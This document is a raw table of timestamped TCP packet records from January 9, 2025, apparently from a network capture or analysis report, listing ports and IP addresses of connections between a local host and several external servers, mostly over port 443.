                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.534516096 CET60860443192.168.2.418.244.18.27
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.542058945 CET60860443192.168.2.418.244.18.27
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.542073011 CET4436086018.244.18.27192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.631741047 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.631752968 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.631938934 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.635040998 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.635066032 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.635175943 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.636930943 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.636941910 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.637528896 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.637545109 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653031111 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653038025 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653093100 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653383970 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653398037 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653532982 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653613091 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653621912 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653845072 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.653858900 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873663902 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873692036 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873832941 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873857975 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873867989 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.873919964 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.874249935 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.874264002 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.874366045 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.874378920 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.883017063 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.887767076 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.888823986 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.893630028 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.893757105 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.898571014 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.962100029 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.962127924 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.962229967 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.963483095 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.963520050 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.963579893 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.974806070 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.974822044 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.975065947 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.975078106 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.090221882 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.096900940 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.106017113 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.118732929 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.118752956 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119014025 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119019985 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119348049 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119477034 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119491100 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119646072 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119705915 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.119971037 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.120727062 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.127742052 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.149915934 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.149930954 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.149997950 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.150350094 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.150427103 CET44360884172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.151475906 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.151542902 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.154808998 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.154973984 CET44360885172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.222287893 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.222295046 CET44360886172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.222328901 CET60885443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.228177071 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.228185892 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.228498936 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.228509903 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.229198933 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.229207039 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.229268074 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.255877972 CET60884443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.255883932 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.260175943 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.323828936 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.324338913 CET60886443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.327867985 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.419162989 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.419162035 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.525259972 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.532912016 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.546026945 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.575018883 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.580059052 CET806088380.78.22.111192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.580131054 CET6088380192.168.2.480.78.22.111
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.590869904 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.590970039 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.596626997 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.596662045 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.596915960 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.596930027 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.597090006 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.597323895 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.597341061 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.597352028 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.598155022 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.601610899 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.601629972 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.602684975 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.602695942 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.602758884 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.632914066 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.632937908 CET44360887172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.637389898 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.775135040 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.775284052 CET44360889162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.775693893 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.775829077 CET44360888162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.776700974 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.776813984 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.785124063 CET60887443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.816714048 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.816869974 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.822264910 CET60888443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.837174892 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.853005886 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.853015900 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.853394032 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.857305050 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.857793093 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.857806921 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.857832909 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.857867002 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.866631031 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.866712093 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.893867970 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.903345108 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.922594070 CET60889443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.922641039 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.935323954 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971541882 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971719980 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971790075 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971844912 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971940994 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.971986055 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.012151957 CET60891443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.012178898 CET4436089120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.012191057 CET6090980192.168.2.4104.16.185.241
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017069101 CET8060909104.16.185.241192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017178059 CET6090980192.168.2.4104.16.185.241
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017337084 CET6090980192.168.2.4104.16.185.241
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017594099 CET60890443192.168.2.418.238.49.74
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.017612934 CET4436089018.238.49.74192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.022108078 CET8060909104.16.185.241192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.064138889 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.064228058 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.064302921 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.066442013 CET60904443192.168.2.420.110.205.119
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.066452026 CET4436090420.110.205.119192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.274393082 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.274415970 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.274583101 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.275209904 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.275226116 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.293909073 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.293930054 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.294152975 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.294616938 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.294631958 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.294701099 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.295692921 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.295702934 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.295902014 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296051025 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296063900 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296331882 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296349049 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296519041 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.296530962 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.495218992 CET8060909104.16.185.241192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.526582003 CET6090980192.168.2.4104.16.185.241
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.531626940 CET8060909104.16.185.241192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.531673908 CET6090980192.168.2.4104.16.185.241
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.594765902 CET60920443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.594803095 CET44360920149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.594882965 CET60920443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.596458912 CET60920443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.596473932 CET44360920149.154.167.220192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.632930994 CET60921443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.632951021 CET4436092120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.633426905 CET60921443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.633624077 CET60921443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.633634090 CET4436092120.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.635302067 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.635339022 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.635983944 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.636140108 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.636152029 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.751581907 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.751842976 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.751857042 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.752871037 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.752933025 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.753972054 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.754024029 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.778202057 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.778501034 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.778523922 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.779522896 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.779582977 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.779879093 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.779938936 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868479967 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868689060 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868714094 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868786097 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868954897 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.868968964 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.869569063 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.869682074 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.869810104 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.869858027 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.870513916 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.870582104 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.870599985 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.870659113 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.901556969 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.901571035 CET44360916104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.921335936 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.921344995 CET44360915104.70.121.217192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.921360016 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.921365976 CET44360917204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.020246029 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.020262957 CET44360914204.79.197.219192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.020286083 CET60916443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.134783983 CET60915443192.168.2.4104.70.121.217
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.134784937 CET60917443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.182903051 CET60914443192.168.2.4204.79.197.219
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.208697081 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.208926916 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.208962917 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209310055 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209626913 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209690094 CET4436092220.42.65.93192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209805965 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209888935 CET60922443192.168.2.420.42.65.93
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.209913969 CET4436092220.42.65.93192.168.2.4
